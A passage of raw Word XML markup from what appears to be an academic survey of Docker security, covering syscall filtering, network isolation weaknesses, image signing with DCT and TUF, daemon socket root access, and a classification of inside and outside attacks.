      </w:r>
      <w:r w:rsidR="00FB43EF">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00C34D81">
        <w:t>a secure environment</w:t>
      </w:r>
      <w:r w:rsidR="00970509">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0050359F">
        <w:t xml:space="preserve"> It enables users to </w:t>
      </w:r>
      <w:r w:rsidR="001B1EED">
        <w:t xml:space="preserve">restrict </w:t>
      </w:r>
      <w:r w:rsidR="00F25D9A">
        <w:t xml:space="preserve">and filter </w:t>
      </w:r>
      <w:r w:rsidR="00417349">
        <w:t xml:space="preserve">system calls </w:t>
      </w:r>
      <w:r w:rsidR="00735488">
        <w:t>between the Docker con</w:t>
      </w:r>
      <w:r w:rsidR="006442C3">
        <w:t xml:space="preserve">tainers </w:t>
      </w:r>
      <w:r w:rsidR="00DE3A6B">
        <w:t xml:space="preserve">and the </w:t>
      </w:r>
      <w:r w:rsidR="005619BF">
        <w:t>host’s Linux kernel.</w:t>
      </w:r>
      <w:r w:rsidR="00FF464B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1492601850"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00FF464B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FF464B">
            <w:instrText xml:space="preserve"> CITATION HZh21 \l 2057  \m AEf20</w:instrText>
          </w:r>
          <w:r w:rsidR="004C7BDA">
            <w:instrText xml:space="preserve"> \m SGa16</w:instrText>
          </w:r>
          <w:r w:rsidR="00FF464B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[42, 43, 44]</w:t>
          </w:r>
          <w:r w:rsidR="00FF464B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004C7BDA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C44F19">
        <w:t xml:space="preserve"> Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="004C7BDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00141136">
        <w:t xml:space="preserve">the host security can be improved </w:t>
      </w:r>
      <w:r w:rsidR="00770A87">
        <w:t xml:space="preserve">by implementing additional </w:t>
      </w:r>
      <w:r w:rsidR="00D81219">
        <w:t xml:space="preserve">Linux kernel </w:t>
      </w:r>
      <w:r w:rsidR="00E035FF">
        <w:t>solutions, including SELinux, AppAr</w:t>
      </w:r>
      <w:r w:rsidR="009A2BFB">
        <w:t>mor, and seccomp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346F745" w14:textId="0622DABF" w:rsidR="009A2BFB" w:rsidRDefault="009A2BFB" w:rsidP="00745D17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc86859258"/>
      <w:r>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidR="00D41BA1">
        <w:t>Isolation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3009237F" w14:textId="160C7428" w:rsidR="00980894" w:rsidRDefault="00FC4338" w:rsidP="00745D17">
      <w:r>
        <w:t xml:space="preserve">Containers are designed to </w:t>
      </w:r>
      <w:r w:rsidR="00265F90">
        <w:t xml:space="preserve">work </w:t>
      </w:r>
      <w:r w:rsidR="00BC0F2B">
        <w:t>within their own isolated environment</w:t>
      </w:r>
      <w:r w:rsidR="006A230C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002743F9">
        <w:t>implying</w:t>
      </w:r>
      <w:r w:rsidR="00D3578F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0098039E">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00D3578F">
        <w:t xml:space="preserve">they cannot interact unless </w:t>
      </w:r>
      <w:r w:rsidR="005A36E8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00460ED2">
        <w:t xml:space="preserve">network channel is </w:t>
      </w:r>
      <w:r w:rsidR="00A90FA7">
        <w:t>established</w:t>
      </w:r>
      <w:r w:rsidR="00460ED2">
        <w:t xml:space="preserve"> between them.</w:t>
      </w:r>
      <w:r w:rsidR="002F65A9">
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidR="00562446">
        <w:t xml:space="preserve">uses </w:t>
      </w:r>
      <w:r w:rsidR="005368DA">
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r w:rsidR="00FD312A">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="0081786C">
        <w:t xml:space="preserve">establish communication </w:t>
      </w:r>
      <w:r w:rsidR="006036F3">
        <w:t xml:space="preserve">between containers and supports various </w:t>
      </w:r>
      <w:r w:rsidR="00AA671C">
        <w:t xml:space="preserve">network types, such as </w:t>
      </w:r>
      <w:r w:rsidR="00EB6F57">
        <w:t xml:space="preserve">bridge, overlay, </w:t>
      </w:r>
      <w:r w:rsidR="00AE44EE">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00F36041">
        <w:t>Macvlan</w:t>
      </w:r>
      <w:r w:rsidR="00AE44EE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB4701">
        <w:t xml:space="preserve"> Those </w:t>
      </w:r>
      <w:r w:rsidR="000C2BC3">
        <w:t xml:space="preserve">networks help Docker to </w:t>
      </w:r>
      <w:r w:rsidR="00404E0A">
        <w:t xml:space="preserve">share images </w:t>
      </w:r>
      <w:r w:rsidR="00157EB5">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00087F7F">
        <w:t>to control the Docker</w:t>
      </w:r>
      <w:r w:rsidR="0059609A">
        <w:t xml:space="preserve"> daemon remotely through the API.</w:t>
      </w:r>
      <w:r w:rsidR="000554A4">
        <w:t xml:space="preserve"> By default, Docker </w:t>
      </w:r>
      <w:r w:rsidR="009C589F">
        <w:t xml:space="preserve">creates </w:t>
      </w:r>
      <w:r w:rsidR="00AE7EC3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009C589F">
        <w:t xml:space="preserve">bridge network by </w:t>
      </w:r>
      <w:r w:rsidR="003C32A0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">giving </w:t>
      </w:r>
      <w:r w:rsidR="00F530B4">
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidR="00025083">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00F530B4">
        <w:t xml:space="preserve"> and default gateway to containers.</w:t>
      </w:r>
      <w:r w:rsidR="002816AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00554B0E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="002816AB">
        <w:t xml:space="preserve">owever, the </w:t>
      </w:r>
      <w:r w:rsidR="005500F9">
        <w:t xml:space="preserve">bridge network </w:t>
      </w:r>
      <w:r w:rsidR="00574E99">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="004F654F">
        <w:t>susceptible</w:t>
      </w:r>
      <w:r w:rsidR="00574E99">
        <w:t xml:space="preserve"> to ARP or MAC flooding attacks because</w:t>
      </w:r>
      <w:r w:rsidR="00F05086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0098507B">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="0012787D">
        <w:t xml:space="preserve">does not </w:t>
      </w:r>
      <w:r w:rsidR="00322A11">
        <w:t>support filtering or checking incoming and outgoing packets.</w:t>
      </w:r>
      <w:r w:rsidR="003A5B49">
        <w:t xml:space="preserve"> Alternatively, </w:t>
      </w:r>
      <w:r w:rsidR="00F367F3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="003A5B49">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="008C772D">
        <w:t xml:space="preserve">can share </w:t>
      </w:r>
      <w:r w:rsidR="001258A5">
        <w:t xml:space="preserve">IP address from the host </w:t>
      </w:r>
      <w:r w:rsidR="00542ED1">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="003A7EFD">
        <w:t xml:space="preserve">connect to the </w:t>
      </w:r>
      <w:r w:rsidR="004D2E61">
        <w:t>public or internet networks.</w:t>
      </w:r>
      <w:r w:rsidR="00697B07">
        <w:t xml:space="preserve"> However, this met</w:t>
      </w:r>
      <w:r w:rsidR="005B5941">
        <w:t xml:space="preserve">hod is more vulnerable to security breaches </w:t>
      </w:r>
      <w:r w:rsidR="00BD17BE">
        <w:t xml:space="preserve">as it exposes </w:t>
      </w:r>
      <w:r w:rsidR="00867AA4">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00BD17BE">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="00E839AD">
        <w:t>to public networks directly</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1976871148"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F72A0C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F72A0C">
            <w:instrText xml:space="preserve"> CITATION doc161 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="008D29A0">
            <w:instrText xml:space="preserve"> \m TCo16</w:instrText>
          </w:r>
          <w:r w:rsidR="00F72A0C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[45, 46]</w:t>
          </w:r>
          <w:r w:rsidR="00F72A0C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E839AD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003A5B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4319D" w14:textId="1A2D76E2" w:rsidR="00745D17" w:rsidRDefault="00B307C8" w:rsidP="00745D17">
      <w:r>
        <w:t xml:space="preserve">Images </w:t>
      </w:r>
      <w:r w:rsidR="006F11A1">
        <w:t xml:space="preserve">are stored and distributed from </w:t>
      </w:r>
      <w:r w:rsidR="00AB481D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00267DF7">
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidR="00A93C1B">
        <w:t>Docker hub repository</w:t>
      </w:r>
      <w:r w:rsidR="00C92D9A">
        <w:t xml:space="preserve"> over a </w:t>
      </w:r>
      <w:r w:rsidR="006366C6">
        <w:t xml:space="preserve">secure </w:t>
      </w:r>
      <w:r w:rsidR="00C92D9A">
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r w:rsidR="00385CE2">
        <w:t>connection.</w:t>
      </w:r>
      <w:r w:rsidR="00CB3D99">
        <w:t xml:space="preserve"> In addition, Docker allows users to verify </w:t>
      </w:r>
      <w:r w:rsidR="00CA11BE">
        <w:t xml:space="preserve">images </w:t>
      </w:r>
      <w:r w:rsidR="00391C1D">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="005D4187">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00391C1D">
        <w:t>hash technique</w:t>
      </w:r>
      <w:r w:rsidR="006B06EF">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00C4151B">
        <w:t xml:space="preserve">check </w:t>
      </w:r>
      <w:r w:rsidR="005D4187">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="00AB504C">
        <w:t xml:space="preserve"> integrity and o</w:t>
      </w:r>
      <w:r w:rsidR="00441A1D">
        <w:t>riginality</w:t>
      </w:r>
      <w:r w:rsidR="00ED5687">
        <w:t xml:space="preserve"> using Docker content trust (DCT)</w:t>
      </w:r>
      <w:r w:rsidR="00441A1D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F23D65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C5149">
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00F23D65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD5DC1">
        <w:t>also utilises</w:t>
      </w:r>
      <w:r w:rsidR="00787A37">
        <w:t xml:space="preserve"> the update </w:t>
      </w:r>
      <w:r w:rsidR="006F7F22">
        <w:t>framework (TUF)</w:t>
      </w:r>
      <w:r w:rsidR="004820C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E23DD2">
        <w:t>to verify t</w:t>
      </w:r>
      <w:r w:rsidR="0083212F">
        <w:t xml:space="preserve">he publisher content </w:t>
      </w:r>
      <w:r w:rsidR="002044EE">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006030EE">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00A42C84">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00057682">
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidR="00A42C84">
        <w:t xml:space="preserve"> of Docker images</w:t>
      </w:r>
      <w:r w:rsidR="00057682">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002B6785">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="003061F8">
        <w:t>TUF</w:t>
      </w:r>
      <w:r w:rsidR="006116CA">
        <w:t xml:space="preserve"> provides </w:t>
      </w:r>
      <w:r w:rsidR="00437A51">
        <w:t>secure software update system</w:t>
      </w:r>
      <w:r w:rsidR="00E965FC">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007E4006">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67EBE">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:r w:rsidR="00E708E6">
        <w:t xml:space="preserve"> various attacks</w:t>
      </w:r>
      <w:r w:rsidR="00437A51">
        <w:t>, such as replay attacks</w:t>
      </w:r>
      <w:r w:rsidR="00D83A92">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A259E3">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="00096329">
        <w:t xml:space="preserve">the Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00E276BB">
        <w:t xml:space="preserve">is an essential component that </w:t>
      </w:r>
      <w:r w:rsidR="003A43D2">
        <w:t xml:space="preserve">allows users to interact </w:t>
      </w:r>
      <w:r w:rsidR="005F14FC">
        <w:t xml:space="preserve">and conduct Docker commands </w:t>
      </w:r>
      <w:r w:rsidR="006003A1">
        <w:t>via the API from another host</w:t>
      </w:r>
      <w:r w:rsidR="003D0425">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D15978">
        <w:t xml:space="preserve"> It is managed remotely</w:t>
      </w:r>
      <w:r w:rsidR="001C17AF">
        <w:t xml:space="preserve"> using the UNIX socket located at </w:t>
      </w:r>
      <w:r w:rsidR="00087F48">
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="0019129F">
        <w:t xml:space="preserve">, and it </w:t>
      </w:r>
      <w:r w:rsidR="00360733">
        <w:t xml:space="preserve">gives </w:t>
      </w:r>
      <w:r w:rsidR="0019129F">
        <w:t>root access</w:t>
      </w:r>
      <w:r w:rsidR="00360733">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00A33389">
        <w:t>any Docker user</w:t>
      </w:r>
      <w:r w:rsidR="0090477F">
        <w:t xml:space="preserve"> by default</w:t>
      </w:r>
      <w:r w:rsidR="00D270FE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B3555">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00A77FE1">
        <w:t>means that any user can run a container with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="006E20B5">
        <w:t>, enabling</w:t>
      </w:r>
      <w:r w:rsidR="003B35A2">
        <w:t xml:space="preserve"> root access</w:t>
      </w:r>
      <w:r w:rsidR="006A309E">
        <w:t xml:space="preserve"> to the host</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1603299947"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009A2540">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009A2540">
            <w:instrText xml:space="preserve"> CITATION doc16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002F5A15">
            <w:instrText xml:space="preserve"> \m git21</w:instrText>
          </w:r>
          <w:r w:rsidR="004673E0">
            <w:instrText xml:space="preserve"> \m TCo16</w:instrText>
          </w:r>
          <w:r w:rsidR="009A2540">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[47, 48, 46]</w:t>
          </w:r>
          <w:r w:rsidR="009A2540">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006A309E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001E3106">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDA665" w14:textId="44C204FF" w:rsidR="00526B06" w:rsidRDefault="0099358C" w:rsidP="00526B06">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc86859259"/>
      <w:r>
        <w:t>DOCKER SECURITY THREATS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="45B80DC6" w14:textId="22CD62C0" w:rsidR="00F373C6" w:rsidRDefault="00337ABC" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00983B01">
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00DC5A69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A02042">
        <w:t xml:space="preserve">platform </w:t>
      </w:r>
      <w:r w:rsidR="007A0F89">
        <w:t xml:space="preserve">has become the de facto </w:t>
      </w:r>
      <w:r w:rsidR="00591D2F">
        <w:t xml:space="preserve">for deploying containerised applications </w:t>
      </w:r>
      <w:r w:rsidR="00004416">
        <w:t>within the cloud</w:t>
      </w:r>
      <w:r w:rsidR="006C4ED3">
        <w:t xml:space="preserve"> in recent years</w:t>
      </w:r>
      <w:r w:rsidR="00B510CC">
        <w:t xml:space="preserve"> because of its </w:t>
      </w:r>
      <w:r w:rsidR="006471C8">
        <w:t>flexibility, efficiency, and scalability.</w:t>
      </w:r>
      <w:r w:rsidR="00FF0DC6">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00965459">
        <w:t xml:space="preserve">its security </w:t>
      </w:r>
      <w:r w:rsidR="00D4172D">
        <w:t xml:space="preserve">strategy is </w:t>
      </w:r>
      <w:r w:rsidR="006E4AD6">
        <w:t>in its early stage to be adopted by many enterprises.</w:t>
      </w:r>
      <w:r w:rsidR="00124DBD">
        <w:t xml:space="preserve"> For example, Docker shares the host kernel</w:t>
      </w:r>
      <w:r w:rsidR="00E82946">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005160F6">
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="00837120">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="005160F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0060424B">
        <w:t xml:space="preserve">a container to </w:t>
      </w:r>
      <w:r w:rsidR="00583333">
        <w:t xml:space="preserve">several security </w:t>
      </w:r>
      <w:r w:rsidR="00940F52">
        <w:t xml:space="preserve">threats </w:t>
      </w:r>
      <w:r w:rsidR="00400F7C">
        <w:t>that are</w:t>
      </w:r>
      <w:r w:rsidR="007E51E8">
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidR="001D3E8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951198">
        <w:t xml:space="preserve">appropriately </w:t>
      </w:r>
      <w:r w:rsidR="001D3E8D">
        <w:t>configured</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1296986316"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001E0CD6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001E0CD6">
            <w:instrText xml:space="preserve"> CITATION DMe14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001E0CD6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[49]</w:t>
          </w:r>
          <w:r w:rsidR="001E0CD6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001D3E8D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00464CCD">
        <w:t xml:space="preserve"> Unlike VMs, </w:t>
      </w:r>
      <w:r w:rsidR="00732B41">
        <w:t>containers share the same kernel with the host.</w:t>
      </w:r>
      <w:r w:rsidR="00715495">
        <w:t xml:space="preserve"> Consequently, </w:t>
      </w:r>
      <w:r w:rsidR="00A94501">
        <w:t xml:space="preserve">this can </w:t>
      </w:r>
      <w:r w:rsidR="00F85ED7">
        <w:t xml:space="preserve">create </w:t>
      </w:r>
      <w:r w:rsidR="00A94501">
        <w:t xml:space="preserve">security threat </w:t>
      </w:r>
      <w:r w:rsidR="00DD6969">
        <w:t xml:space="preserve">either </w:t>
      </w:r>
      <w:r w:rsidR="005217CB">
        <w:t>from the host or containers</w:t>
      </w:r>
      <w:r w:rsidR="002920F4">
        <w:t xml:space="preserve">, increasing the attack surface </w:t>
      </w:r>
      <w:r w:rsidR="00C07B2B">
        <w:t xml:space="preserve">on containers compared to </w:t>
      </w:r>
      <w:r w:rsidR="00F044EE">
        <w:t>VMs.</w:t>
      </w:r>
      <w:r w:rsidR="00A053F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6039E">
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00DD41FA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F31441">
        <w:t>architecture</w:t>
      </w:r>
      <w:r w:rsidR="00DD41FA">
        <w:t xml:space="preserve"> of Docker containers is </w:t>
      </w:r>
      <w:r w:rsidR="00F31441">
        <w:t xml:space="preserve">based upon </w:t>
      </w:r>
      <w:r w:rsidR="00E90E24">
        <w:t>an open</w:t>
      </w:r>
      <w:r w:rsidR="002D7771">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E90E24">
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:r w:rsidR="00F31441">
        <w:t>LXC technology</w:t>
      </w:r>
      <w:r w:rsidR="0095575A">
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="009B3F7C">
        <w:t xml:space="preserve">increases </w:t>
      </w:r>
      <w:r w:rsidR="00F85E4D">
        <w:t>the vulnerability of Docker systems</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="639847822"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007907EF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007907EF">
            <w:instrText xml:space="preserve"> CITATION XXu20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007907EF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[50]</w:t>
          </w:r>
          <w:r w:rsidR="007907EF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F85E4D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000115B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E5E3B" w14:textId="049365E7" w:rsidR="00E0682D" w:rsidRDefault="000115B6" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">In general, Docker security </w:t>
      </w:r>
      <w:r w:rsidR="0085589B">
        <w:t>threats and vulnerabilities can be ad</w:t>
      </w:r>
      <w:r w:rsidR="00520D6A">
        <w:t>dressed</w:t>
      </w:r>
      <w:r w:rsidR="0085589B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00520D6A">
        <w:t xml:space="preserve">and classified </w:t>
      </w:r>
      <w:r w:rsidR="00153A1A">
        <w:t xml:space="preserve">to the various </w:t>
      </w:r>
      <w:r w:rsidR="004F65A3">
        <w:t>types of known attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00F94B7D">
        <w:t xml:space="preserve"> Docker security </w:t>
      </w:r>
      <w:r w:rsidR="008D069C">
        <w:t xml:space="preserve">issues </w:t>
      </w:r>
      <w:r w:rsidR="00F94B7D">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="004A6333">
        <w:t xml:space="preserve">examined </w:t>
      </w:r>
      <w:r w:rsidR="00A16D5D">
        <w:t xml:space="preserve">on both sides of </w:t>
      </w:r>
      <w:r w:rsidR="00770931">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00A20976">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00770931">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00DB51AB">
        <w:t>, namely outside and inside attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00813242">
        <w:t xml:space="preserve"> The outside attack occurs when</w:t>
      </w:r>
      <w:r w:rsidR="00042A3E">
        <w:t xml:space="preserve"> threat actors gain access from outside the Docker system, whereas the inside </w:t>
      </w:r>
      <w:r w:rsidR="00AB00F3">
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidR="003734B9">
        <w:t xml:space="preserve">happens </w:t>
      </w:r>
      <w:r w:rsidR="00D71184">
        <w:t xml:space="preserve">when </w:t>
      </w:r>
      <w:r w:rsidR="0069049F">
        <w:t xml:space="preserve">the attacker is </w:t>
      </w:r>
      <w:r w:rsidR="006C22F9">
        <w:t xml:space="preserve">trying to gain access maliciously </w:t>
      </w:r>
      <w:r w:rsidR="00617FAB">
        <w:t>from inside</w:t>
      </w:r>
      <w:r w:rsidR="002E2F72">
        <w:t xml:space="preserve"> the Docker </w:t>
      </w:r>
      <w:r w:rsidR="00617FAB">
        <w:t>environment</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1697921313"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B64D20">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B64D20">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B64D20">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00B64D20">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002E2F72">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E26A3">
        <w:t xml:space="preserve"> Also, </w:t>
      </w:r>
      <w:r w:rsidR="001E7149">
        <w:t xml:space="preserve">Docker security issues can be discussed </w:t>
      </w:r>
      <w:r w:rsidR="00D1290C">
        <w:t>with its</w:t>
      </w:r>
      <w:r w:rsidR="001B3C8D">
